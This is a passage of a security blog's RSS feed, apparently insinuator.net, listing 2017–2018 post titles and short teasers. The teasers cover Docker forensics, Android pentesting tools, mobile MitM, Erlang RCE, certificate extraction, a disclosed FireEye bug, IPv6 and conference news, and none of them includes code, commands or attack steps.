      <pubDate>Wed, 14 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/white-paper-on-incident-analysis-and-forensics-in-docker-environments/</guid>
      <description>&lt;p&gt;In this article, we describe the impact of the increased use of &lt;em&gt;Docker&lt;/em&gt; in corporate environments on forensic investigations and incident analysis. Even though Docker is being used more and more (Portworx, Inc., 2017), the implications of the changed runtime environment for forensic processes and tools have barely been considered. We describe the technological basics of Docker and, based on them, outline the differences that occur with respect to digital evidence and previously used methods for evidence acquisition. Specifically, we look at digital evidence within a Docker container which are lost or need to be acquired in different ways compared to a classical virtual machine, and what new traces and opportunities arise from Docker itself.&lt;/p&gt;</description>
    </item>
    <item>
      <title>AndroTickler: Tickling Vulnerabilities out of Android Apps</title>
      <link>https://insinuator.net/2018/02/androtickler-tickling-vulnerabilities-out-of-android-apps/</link>
      <pubDate>Sat, 10 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/androtickler-tickling-vulnerabilities-out-of-android-apps/</guid>
      <description>&lt;p&gt;If you attack someone, they will defend themselves, but if you tickle them, they will eventually crack open. This surprisingly applies to Android apps as well! Therefore, I created AndroTickler, not to test apps against certain attacks or examine them for specific vulnerabilities, which developers would learn to avoid. However, it helps pentesters to analyze and test apps in their own style, but in a faster, easier and more flexible way. AndroTickler is a Swiss-Army-Knife pentesting tool for Android apps. It provides information gathering, static and dynamic analysis features, and also automates actions that pentesters frequently do and highly need during their pentests. In addition, it makes use of the powerful Frida to hook to the app and manipulate it in real-time.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2018 – CFP and First talks</title>
      <link>https://insinuator.net/2018/02/telcosecday-2018-cfp-and-first-talks/</link>
      <pubDate>Thu, 08 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/telcosecday-2018-cfp-and-first-talks/</guid>
      <description>&lt;p&gt;We have a short update from the TelcoSecDay 2018 Agenda. But before that, a short reminder. The CFP for TelcoSecDay 2018 is still open. If you are into telco research, and if you have something interesting to talk, please make a submission &lt;a href=&#34;https://cfp.ernw-insight.de/tsd18/&#34;&gt;here&lt;/a&gt;. The deadline is &lt;strong&gt;17th February 2018.&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Here are the first two confirmed speakers who are going to talk about the below mentioned topics:&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Title: Data Security for 4G Interconnection and 5G Interconnection Risk Areas&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hacking 101 to mobile data</title>
      <link>https://insinuator.net/2018/02/hacking-101-to-mobile-data/</link>
      <pubDate>Tue, 06 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/hacking-101-to-mobile-data/</guid>
      <description>&lt;p&gt;Here is a short blog post that explains how you can make your own Man-in-the-Middle (MitM) setup for sniffing the traffic between a SIM card and the backend server. This is** NOT a new research** but I hope this will help anyone who doesn’t have a telco background to get started to play with mobile data sniffing and fake base stations. This is applicable to many scenarios today as we have so many IoT devices with SIM cards in it that connects to the backend.&lt;br&gt;&#xA;In this particular case, I am explaining the simplest scenario where the SIM card is working with 2G and GPRS. You can probably expect me with more articles with 3G, 4G MitM in future. But lets stick to 2G and GPRS for now.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blackhoodie at TROOPERS18</title>
      <link>https://insinuator.net/2018/02/blackhoodie-at-troopers18/</link>
      <pubDate>Fri, 02 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/blackhoodie-at-troopers18/</guid>
      <description>&lt;p&gt;We are thrilled to announce the &lt;a href=&#34;https://insinuator.net/tag/blackhoodie/&#34;&gt;Blackhoodie event&lt;/a&gt; at &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers 2018&lt;/a&gt; on March 12th and 13th in Heidelberg. This time it is going to be a 2 day workshop with various interesting topics related to reverse engineering. We will make sure that you get some hands on experience with reversing and more.&lt;/p&gt;&#xA;&lt;p&gt;As always, one of the main motivation for &lt;a href=&#34;https://www.blackhoodie.re/about/&#34;&gt;Blackhoodie&lt;/a&gt; is bringing more women into reversing.&lt;br&gt;&#xA;So we would like to see more women apply to the training slots. However, we are open to everyone who would like to apply. We do have a very limited number of seats at this training site. So we apologize in advance if we can’t accommodate everyone, even though we wish we could! Please apply before &lt;strong&gt;“February 20th”&lt;/strong&gt; and we will contact you regarding next steps.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Virtualized Training Environment with Ansible</title>
      <link>https://insinuator.net/2018/02/virtualized-training-environment-with-ansible/</link>
      <pubDate>Fri, 02 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/virtualized-training-environment-with-ansible/</guid>
      <description>&lt;p&gt;As Kai and I will be holding a &lt;a href=&#34;https://troopers.de/troopers18/trainings/tr18-automation-with-ansible/&#34;&gt;TROOPERS workshop on automation with ansible&lt;/a&gt;, we needed a setup for the attendees to use &lt;a href=&#34;https://www.ansible.com/&#34;&gt;ansible&lt;/a&gt; against virtual machines we set up with the necessary environment. The idea was, that every attendee has their own VMs to run ansible against, ideally including one to run ansible from, as we want to avoid setup or version incompatibilities if they set up their own ansible environment on their laptop.  Also they should only be able to talk to their own machines, thus avoiding conflicts because of accidental usage of wrong IPs or host names but also simplify the setup for the users.&lt;/p&gt;</description>
    </item>
    <item>
      <title>White Paper on Multi-Factor Authentication in Microsoft Windows Environments</title>
      <link>https://insinuator.net/2018/01/white-paper-on-multi-factor-authentication-in-microsoft-windows-environments/</link>
      <pubDate>Mon, 29 Jan 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/01/white-paper-on-multi-factor-authentication-in-microsoft-windows-environments/</guid>
      <description>&lt;p&gt;A new ERNW whitepaper was just published. I wrote this whitepaper in the course of my bachelor thesis and it examines multi-factor authentication in Microsoft Windows environments:&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;Credential theft and the subsequent reuse of stolen credentials are a significant problem in today’s information security. To counter the associated risks, a planned approach is required as part of a comprehensive security architecture program. This includes the implementation of multi-factor authentication as an important building block. This whitepaper covers the relevant steps of implementing a multi-factor authentication system in an enterprise environment and closes with a security evaluation.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR18 Active Directory Security Track</title>
      <link>https://insinuator.net/2018/01/%23tr18-active-directory-security-track/</link>
      <pubDate>Fri, 05 Jan 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/01/%23tr18-active-directory-security-track/</guid>
      <description>&lt;p&gt;A happy new year to everybody!&lt;/p&gt;&#xA;&lt;p&gt;At &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers18&lt;/a&gt; there will be a new special track on Microsoft Active Directory and its security aspects, similar to the SAP security track which we established some years ago. The AD security track will feature, amongst others, the following talks.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Sean Metcalf: Active Directory Security. The Journey&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Abstract&lt;/strong&gt;: This talk is a journey into the challenges most organizations encounter while trying to secure their ‘castle’. The attacker has to be right only once, right? Not exactly. We will walk through effective security strategies that will stymie and frustrate attackers and better protect the Active Directory environment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Yet another edition of BlackHoodie – #BlackHoodie17</title>
      <link>https://insinuator.net/2017/12/yet-another-edition-of-blackhoodie-%23blackhoodie17/</link>
      <pubDate>Mon, 11 Dec 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/12/yet-another-edition-of-blackhoodie-%23blackhoodie17/</guid>
      <description>&lt;p&gt;I am amazed by how this years &lt;a href=&#34;https://www.blackhoodie.re/&#34;&gt;BlackHoodie&lt;/a&gt; unraveled. Three days that included a pre-conference of lightening talks and two parallel tracks with a total of 64 enthusiastic members. The very spirit of &lt;a href=&#34;https://www.blackhoodie.re/&#34;&gt;BlackHoodie&lt;/a&gt; is nothing other than the quest to gain deep knowledge. Reverse engineering is one of the hardest fields in security. It touches on all fields of computing, starting from assembly, programming, file formats, operating systems, networks and what not. This makes it hard but an extremely fulfilling experience to spend time learning it. For me, the very idea of staring at a binary till you understand what it does is a magical feeling.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Let’s talk about RFC 6980</title>
      <link>https://insinuator.net/2017/12/lets-talk-about-rfc-6980/</link>
      <pubDate>Fri, 01 Dec 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/12/lets-talk-about-rfc-6980/</guid>
      <description>&lt;p&gt;Following my work with the &lt;a href=&#34;https://insinuator.net/2017/06/testing-rfc-6980-implementations-of-freebsd/&#34;&gt;FreeBSD implementation of RFC 6980&lt;/a&gt; I was happy to present my work at last week’s DENOG 9 meeting.&lt;br&gt;&#xA;To make it available to anyone who did not meet me there and go into some more detail that would have exceeded the boundaries of the talk, I will cover the topic here.&lt;/p&gt;&#xA;&lt;p&gt;After the preceding work on &lt;a href=&#34;https://insinuator.net/2017/03/testing-rfc-6980-implementations-with-chiron/&#34;&gt;Windows Server 2016&lt;/a&gt; and the FreeBSD testing, as a Linux user, lover and administrator, I of course wanted to take a look at how different Linux systems complied with the RFC 6980 standard.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Announcing the first 5 talks of TROOPERS18!!!!</title>
      <link>https://insinuator.net/2017/11/announcing-the-first-5-talks-of-troopers18/</link>
      <pubDate>Wed, 29 Nov 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/11/announcing-the-first-5-talks-of-troopers18/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://www.troopers.de/troopers17/&#34;&gt;TROOPERS17&lt;/a&gt; was unlike any TROOPERS we had known before. Everything just seemed bolder, better, and beyond our expectations. From surprise speakers like &lt;a href=&#34;https://twitter.com/thegrugq&#34;&gt;the grugq&lt;/a&gt; (do you have a follow-up talk for #TR18 by the way?) to new speakers who are now TROOPERS family, TROOPERS17 is one for the history books!&lt;/p&gt;&#xA;&lt;p&gt;If you were there you might be wondering to yourself, how could they possibly top it (and if you were not there check out this &lt;a href=&#34;https://www.youtube.com/watch?v=pfA63LGkf0w&#34;&gt;video from TR17&lt;/a&gt;)? Well, I am not going to lie, it will be a challenge. However, the high quality of talk and training submissions for this year have us feeling pretty positive about making #TR18 the “best year ever”!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Why It Might Make Sense to Use IPv6 in Enterprise Infrastructure Projects</title>
      <link>https://insinuator.net/2017/11/why-it-might-make-sense-to-use-ipv6-in-enterprise-infrastructure-projects/</link>
      <pubDate>Fri, 10 Nov 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/11/why-it-might-make-sense-to-use-ipv6-in-enterprise-infrastructure-projects/</guid>
      <description>&lt;p&gt;Looking at IPv6 deployment graphs like &lt;a href=&#34;https://twitter.com/Enno_Insinuator/status/926767238920658950&#34;&gt;this one&lt;/a&gt; it becomes clear that IPv6 still is not widely deployed in enterprise space (the reason for the apparent oscillation in that curve is the difference between working days – where people use their office computers – and weekend where they preferably use their smartphones or their home equipment connected by means of broadband networks).&lt;/p&gt;&#xA;&lt;p&gt;There’s a number of good reasons for this (in a nutshell: the overall IPv6 architecture is oriented around, and benefits, the decoupling of mostly autonomous, self-organized endpoints from a well-managed/provider-managed network infrastructure which isn’t exactly the operations model many large enterprise organizations have in mind for their networks. also you might have a look at &lt;a href=&#34;https://ripe74.ripe.net/presentations/67-Enno_Rey_RIPE74_Structural_Deficits_IPv6.pdf&#34;&gt;these slides&lt;/a&gt; from RIPE74 to understand some of the reluctance to deploy IPv6 in certain companies).&lt;/p&gt;</description>
    </item>
    <item>
      <title>My Journey to DockerCon Europe 2017</title>
      <link>https://insinuator.net/2017/11/my-journey-to-dockercon-europe-2017/</link>
      <pubDate>Thu, 09 Nov 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/11/my-journey-to-dockercon-europe-2017/</guid>
      <description>&lt;p&gt;From October 17th – 19th I had the chance to attend my first &lt;a href=&#34;https://europe-2017.dockercon.com/&#34;&gt;DockerCon Europe 2017&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The conference was very well organized and attendee focused, which could be seen by the many little details found on the conference. For example you never ran out of coffee or beverages, there was a new Hallway Track where you could meet people from all disciplines, discuss about your favorite topics and there was always a place to sit and take a break between all those interesting presentations. I had the chance to speak to very nice people from different industries, most importantly in my case on the topic security. It was nice to see how the Docker community is growing and the adoption rate is increasing, especially in companies. The main focus of the conference (especially seen in talks held by people from Docker Inc.) was the Docker Enterprise Edition.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Interacting with the BlueCoat Filesystem</title>
      <link>https://insinuator.net/2017/10/interacting-with-the-bluecoat-filesystem/</link>
      <pubDate>Thu, 26 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/interacting-with-the-bluecoat-filesystem/</guid>
      <description>&lt;p&gt;the last &lt;a href=&#34;https://insinuator.net/2017/10/reading-the-bluecoat-filesystem/&#34;&gt;post&lt;/a&gt; was about a fuse filesystem which provides a read-only access to the proprietary bluecoat filesystem. After some further investigations based on the possibilities this offered us, I started to implement a tool which allows to modify parts of the filesystem.&lt;/p&gt;&#xA;&lt;h2 id=&#34;protection-mechanisms&#34;&gt;Protection Mechanisms&lt;/h2&gt;&#xA;&lt;p&gt;Since last time, the discovered filesystem structures still had unknown fields. Some of those fields could be reconstructed and their purpose in the whole construct. The format of the &lt;code&gt;Partition&lt;/code&gt;-Header for example could now be described as&lt;/p&gt;</description>
    </item>
    <item>
      <title>Extract Non-Exportable Certificates and Evade Anti-Virus with Mimikatz and Powersploit</title>
      <link>https://insinuator.net/2017/10/extract-non-exportable-certificates-and-evade-anti-virus-with-mimikatz-and-powersploit/</link>
      <pubDate>Fri, 20 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/extract-non-exportable-certificates-and-evade-anti-virus-with-mimikatz-and-powersploit/</guid>
      <description>&lt;p&gt;Some time ago, one of our customers contacted us with a special request. For some legitimate reason, they needed to centrally collect certain certificates including their private keys which were distributed across many client systems running Windows and stored in the corresponding user stores. Unfortunately (only in this case, but actually good from a security perspective), the particular private keys were marked non-exportable making a native export in the context of the user impossible. As if this wasn’t enough, the extraction was supposed to be executed in the context of the current user (i.e. without administrative privileges) while not triggering the existing Anti Virus solution at all. Also, the certificates needed to be transferred to some trusted system where they could not be accessed in an unauthorized way. So let’s have a look how we tackled these problems:&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS for Students!</title>
      <link>https://insinuator.net/2017/10/troopers-for-students/</link>
      <pubDate>Thu, 12 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/troopers-for-students/</guid>
      <description>&lt;p&gt;We are super excited for &lt;a href=&#34;https://www.troopers.de/&#34;&gt;TROOPERS18&lt;/a&gt; (March 12-16th, 2018) as are many of you! We even have this great saying that “&lt;em&gt;after&lt;/em&gt; TROOPERS is &lt;em&gt;before&lt;/em&gt; TROOPERS”, which means we spend a lot of time looking through feedback from attendees, speakers/trainers, and our own Crew for ways to not only top what we’ve done in the years before, but also how to simply make it &lt;strong&gt;better&lt;/strong&gt; for everyone involved.  Looking around at our Crew we realized how many have either attended TROOPERS or other conferences as students. We heard from them, as well as other students, how life changing it was to be able, as a student, to attend an IT-Security conference. How they got to meet a speaker whose work they’d read about in class. How people felt even more a part of the community they were studying hard to belong to. &lt;/p&gt;</description>
    </item>
    <item>
      <title>Position Paper on an Enterprise Organization’s IPv6 Address Strategy</title>
      <link>https://insinuator.net/2017/10/position-paper-on-an-enterprise-organizations-ipv6-address-strategy/</link>
      <pubDate>Mon, 09 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/position-paper-on-an-enterprise-organizations-ipv6-address-strategy/</guid>
      <description>&lt;p&gt;A while ago I wrote a short paper laying out options for an enterprise organization to get global IPv6 address space from the RIPE NCC, discussing the advantages and disadvantages of different approaches. As I think the topic may be of interest for others, too, I’ve distilled an anonymized version. It can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_IPv6_Strategy_RIPE.pdf&#34;&gt;here&lt;/a&gt;. I hope some of you find it useful.&lt;/p&gt;&#xA;&lt;p&gt;Cheers, Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Erlang distribution RCE and a cookie bruteforcer</title>
      <link>https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/</link>
      <pubDate>Thu, 05 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/</guid>
      <description>&lt;p&gt;In one of the last pentests we’ve found an &lt;em&gt;epmd&lt;/em&gt; (Erlang port mapper daemon) listening on a target system (tcp/4369). It is used to coordinate distributed erlang instances, but also can lead to a RCE, given one knows the so called “authentication cookie”. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start. If not modified or set manually it is a random string [A:Z] with a length of 20 characters. If an attacker gains this cookie, a RCE is quite easy – as I like to describe below.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reading the BlueCoat FileSystem</title>
      <link>https://insinuator.net/2017/10/reading-the-bluecoat-filesystem/</link>
      <pubDate>Thu, 05 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/reading-the-bluecoat-filesystem/</guid>
      <description>&lt;p&gt;You may remember our &lt;a href=&#34;https://insinuator.net/2016/12/research-diary-blue-coat/&#34;&gt;last post&lt;/a&gt; regarding the SGOS system and the proprietary file system. Since then, we got access to a newer version of the system (6.6.4.2). Still not the most current one (which seems to be 6.7.1.1) nor of the 6.6.x branch (which seems to be 6.6.5.1) though. As this system version also used the same proprietary filesystem (although it initially booted from a FAT32 partition), I decided to take a deeper look into this.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Daycon X1</title>
      <link>https://insinuator.net/2017/10/daycon-x1/</link>
      <pubDate>Wed, 04 Oct 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/10/daycon-x1/</guid>
      <description>&lt;p&gt;This is my short write up on &lt;a href=&#34;http://day-con.org/styled/&#34;&gt;Daycon X1&lt;/a&gt;, 2017.  The summit was held at Dayton, the land where &lt;a href=&#34;https://en.wikipedia.org/wiki/Wright_brothers&#34;&gt;Wright brothers&lt;/a&gt; were born. Apart from being my first US trip, I also gave my first training on Hacking 101 also called the Bootcamp.&lt;/p&gt;&#xA;&lt;p&gt;The Daycon X1  bootcamp started on 18th September. Ahmad, my colleague focused on web security, network scanning and metasploit exercises. I mainly handled classes on reversing and binary exploitation along with some pcap anaylsis and network attacks. It was highly fulfilling  experience to give a workshop. Teaching is definitely the best way to learn any topic by digging deep into it.The simpler you can explain, the more clarity you have on the topic. But I must say that it was indeed exhausting by the end of three days.&lt;/p&gt;</description>
    </item>
    <item>
      <title>RIPE IoT Roundtable Meeting / Balanced Security for IPv6 CPE Revisited</title>
      <link>https://insinuator.net/2017/09/ripe-iot-roundtable-meeting-/-balanced-security-for-ipv6-cpe-revisited/</link>
      <pubDate>Fri, 29 Sep 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/09/ripe-iot-roundtable-meeting-/-balanced-security-for-ipv6-cpe-revisited/</guid>
      <description>&lt;p&gt;Last week I had the pleasure to participate at the first &lt;a href=&#34;https://www.ripe.net/participate/meetings/roundtable/september-2017/ripe-iot-roundtable-meeting-21-september-2017&#34;&gt;&lt;em&gt;RIPE IoT Roundtable Meeting&lt;/em&gt;&lt;/a&gt; in Leeds (thanks! to &lt;a href=&#34;https://www.ripe.net/about-us/press-centre/publications/speakers/marco-hogewoning&#34;&gt;Marco Hogewoning&lt;/a&gt; for organising it). It was a day with many fruitful discussions. I particularly enjoyed &lt;a href=&#34;https://twitter.com/kistel&#34;&gt;Robert Kisteleki&lt;/a&gt;‘s talk on RIPE NCC’s own design &amp;amp; (security) process considerations in the context of &lt;a href=&#34;https://atlas.ripe.net/&#34;&gt;RIPE Atlas&lt;/a&gt; (at TR17 NGI there was an &lt;a href=&#34;https://www.troopers.de/downloads/troopers17/TR17_RIPEatlas.pdf&#34;&gt;intro to Atlas&lt;/a&gt;, too).&lt;br&gt;&#xA;In this post I’d like to quickly lay out the main points of my own contribution on “Balanced Security for IPv6 CPE Revisited” (the slides can be found &lt;a href=&#34;https://www.ernw.de/download/RIPE_IoT_Roundtable_Sep2017_EnnoRey_BalancedIPv6Sec.pdf&#34;&gt;here&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>HITCON CMT 2017</title>
      <link>https://insinuator.net/2017/09/hitcon-cmt-2017/</link>
      <pubDate>Thu, 28 Sep 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/09/hitcon-cmt-2017/</guid>
      <description>&lt;p&gt;Some of our Troopers had the chance to visit HITCON conference in Taiwan this year. There are two main events: HITCON Pacific, which is aimed more at corporate attendees and HITCON CMT, the community edition, which aims at students and the general Infosec community. HITCON is the biggest security conference in Taiwan.&lt;/p&gt;&#xA;&lt;p&gt;The venue for the event is the Academia Sinica, one of the most important academic institution in the Republic of China and was founded in 1928 to promote and undertake scholarly research in sciences and humanities. The conference had three usual tracks and one special track that was free to use for the public for demos, presentations and discussions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>An Update of PenTesting Tools that (do not) Support IPv6</title>
      <link>https://insinuator.net/2017/09/an-update-of-pentesting-tools-that-do-not-support-ipv6/</link>
      <pubDate>Tue, 19 Sep 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/09/an-update-of-pentesting-tools-that-do-not-support-ipv6/</guid>
      <description>&lt;p&gt;As you may remember, back in 2014 we published a &lt;a href=&#34;https://www.ernw.de/download/newsletter/ERNW_Newsletter_45_PenTesting_Tools_that_Support_IPv6_v.1.1_en.pdf&#34;&gt;whitepaper&lt;/a&gt; (compiled by &lt;a href=&#34;https://twitter.com/antoniosatlasis&#34;&gt;Antonis Atlasis&lt;/a&gt;) on the support of IPv6 in different pentesting tools. This is almost three years ago and we thought it is time for an update. In short not much has changed. Most of the tools which didn’t support IPv6 are still not supporting it or haven’t got any update since then.&lt;br&gt;&#xA;This post will  cover the tools where we could identify some progress on supporting IPv6.&lt;/p&gt;</description>
    </item>
    <item>
      <title>FireEye Security Bug: Connection to physical host and adjacent network possible during analysis in Live-Mode</title>
      <link>https://insinuator.net/2017/09/fireeye-security-bug-connection-to-physical-host-and-adjacent-network-possible-during-analysis-in-live-mode/</link>
      <pubDate>Wed, 13 Sep 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/09/fireeye-security-bug-connection-to-physical-host-and-adjacent-network-possible-during-analysis-in-live-mode/</guid>
      <description>&lt;p&gt;We recently identified a security issue in FireEye AX 5400, that also affected other products. We responsibly disclosed the bug to FireEye and a fix that addresses the issue has been released with version 7.7.7. The fix was also merged into the common core and is available as 8.0.1 for other products (i.e. FireEye EX).&lt;/p&gt;&#xA;&lt;p&gt;The related release notes can be found here:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://docs.fireeye.com/docs/docs_en/AX/sw/7.7.7/RN/AX_RN_7.7.7_en.pdf&#34;&gt;https://docs.fireeye.com/docs/docs_en/AX/sw/7.7.7/RN/AX_RN_7.7.7_en.pdf&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://docs.fireeye.com/docs/docs_en/EX/sw/8.0.1/RN/EX_RN_8.0.1_en.pdf&#34;&gt;https://docs.fireeye.com/docs/docs_en/EX/sw/8.0.1/RN/EX_RN_8.0.1_en.pdf&lt;/a&gt;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;FireEye announced to post a 2017 Q3 notice with credit to us, too.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DFRWS USA 2017</title>
      <link>https://insinuator.net/2017/09/dfrws-usa-2017/</link>
      <pubDate>Wed, 06 Sep 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/09/dfrws-usa-2017/</guid>
      <description>&lt;p&gt;As mentioned in my last &lt;a href=&#34;https://insinuator.net/2017/07/release-of-glibc-heap-analysis-plugins-for-rekall/&#34;&gt;blogpost&lt;/a&gt;, I had the pleasure to participate in this years DFRWS USA and present our paper. The paper and presentation can be freely viewed and downloaded &lt;a href=&#34;https://www.dfrws.org/conferences/dfrws-usa-2017/sessions/linux-memory-forensics-dissecting-user-space-process-heap&#34;&gt;here&lt;/a&gt; or &lt;a href=&#34;https://authors.elsevier.com/sd/article/S1742287617301895&#34;&gt;here&lt;/a&gt;. Note that there is also an extended version of the paper, which can be downloaded &lt;a href=&#34;https://opus4.kobv.de/opus4-fau/frontdoor/index/index/docId/8340&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The keepassx, zsh and heap analysis plugins are now also part of the &lt;a href=&#34;https://github.com/google/rekall/releases/tag/v1.7.0rc1&#34;&gt;Rekall release candidate 1.7.0RC1&lt;/a&gt;, so it’s easier to get started.&lt;/p&gt;&#xA;&lt;p&gt;The conference had some great talks and workshops, which I’m going to briefly sum up.&lt;/p&gt;</description>
    </item>
    <item>
      <title>11th USENIX Workshop on Offensive Technologies (WOOT17)</title>
      <link>https://insinuator.net/2017/08/11th-usenix-workshop-on-offensive-technologies-woot17/</link>
      <pubDate>Wed, 16 Aug 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/08/11th-usenix-workshop-on-offensive-technologies-woot17/</guid>
      <description>&lt;p&gt;The 11th USENIX Workshop on Offensive Technologies (WOOT17) took place the last two days in Vancouver. Some colleagues and I had the chance to attend and enjoy the presentations of all accepted papers of this rather small, single-track co-located USENIX event. Unfortunately, the talks have not been recorded. However, all the papers should be available on the &lt;a href=&#34;https://www.usenix.org/conference/woot17/workshop-program&#34;&gt;website&lt;/a&gt;. It’s worth taking a look at all of the papers, but these are some presentations that we’ve enjoyed:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Black Hat 20 &amp; DEFCON 25</title>
      <link>https://insinuator.net/2017/08/black-hat-20-defcon-25/</link>
      <pubDate>Wed, 09 Aug 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/08/black-hat-20-defcon-25/</guid>
      <description>&lt;p&gt;Some of the ERNW Crew hit up Black Hat USA and DEFCON. Our own Omar Eissa even gave his first BH and DEFCON talks! See which talk we liked and what inspiration we took home.&lt;/p&gt;&#xA;&lt;p&gt;BlackHat US 20:&lt;/p&gt;&#xA;&lt;p&gt;ERNW´s Omar Eissa presented on Cisco Autonomic networks showing how&lt;br&gt;&#xA;slides: &lt;a href=&#34;https://www.blackhat.com/docs/us-17/wednesday/us-17-Eissa-Network-Automation-Isn&#39;t-Your-Safe-Haven-Protocol-Analysis-And-Vulnerabilities-Of-Autonomic-Network.pdf&#34;&gt;https://www.blackhat.com/docs/us-17/wednesday/us-17-Eissa-Network-Automation-Isn’t-Your-Safe-Haven-Protocol-Analysis-And-Vulnerabilities-Of-Autonomic-Network.pdf&lt;/a&gt;&lt;br&gt;&#xA;insinuator blogposts:&lt;br&gt;&#xA;&lt;a href=&#34;https://insinuator.net/2017/03/autonomic-network-overview/&#34;&gt;https://insinuator.net/2017/03/autonomic-network-overview/&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;https://insinuator.net/2017/03/autonomic-network-analysis/&#34;&gt;https://insinuator.net/2017/03/autonomic-network-analysis/&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;https://insinuator.net/2017/04/autonomic-network-vulnerabilities/&#34;&gt;https://insinuator.net/2017/04/autonomic-network-vulnerabilities/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;BoradPWN&lt;br&gt;&#xA;– Speaker: Nitay Artenstein&lt;br&gt;&#xA;– Slides: &lt;a href=&#34;https://www.blackhat.com/docs/us-17/thursday/us-17-Artenstein-Broadpwn-Remotely-Compromising-Android-And-iOS-Via-A-Bug-In-Broadcoms-Wifi-Chipsets.pdf&#34;&gt;https://www.blackhat.com/docs/us-17/thursday/us-17-Artenstein-Broadpwn-Remotely-Compromising-Android-And-iOS-Via-A-Bug-In-Broadcoms-Wifi-Chipsets.pdf&lt;/a&gt;&lt;br&gt;&#xA;– Paper: &lt;a href=&#34;https://www.blackhat.com/docs/us-17/thursday/us-17-Artenstein-Broadpwn-Remotely-Compromising-Android-And-iOS-Via-A-Bug-In-Broadcoms-Wifi-Chipsets-wp.pdf&#34;&gt;https://www.blackhat.com/docs/us-17/thursday/us-17-Artenstein-Broadpwn-Remotely-Compromising-Android-And-iOS-Via-A-Bug-In-Broadcoms-Wifi-Chipsets-wp.pdf&lt;/a&gt;&lt;br&gt;&#xA;– Broadly covered in main stream Media –&amp;gt; Wired article, tons of write-ups…link: &lt;a href=&#34;https://www.wired.com/story/broadpwn-wi-fi-vulnerability-ios-android/&#34;&gt;https://www.wired.com/story/broadpwn-wi-fi-vulnerability-ios-android/&lt;/a&gt;&lt;br&gt;&#xA;– Initial Blog Post: &lt;a href=&#34;https://blog.exodusintel.com/2017/07/26/broadpwn/&#34;&gt;https://blog.exodusintel.com/2017/07/26/broadpwn/&lt;/a&gt;&lt;br&gt;&#xA;– He took a deep dive into the internals of the BCM4354, 4358 and 4359 Wi-Fi chipsets and found an issue that he exploited to an extent where he created the world´s first wifi worm.&lt;br&gt;&#xA;– This hits most of the mobiles users pretty hard. Affected devices are for example: Samsung Galaxy from S3 through S8, inclusive All Samsung Notes3. 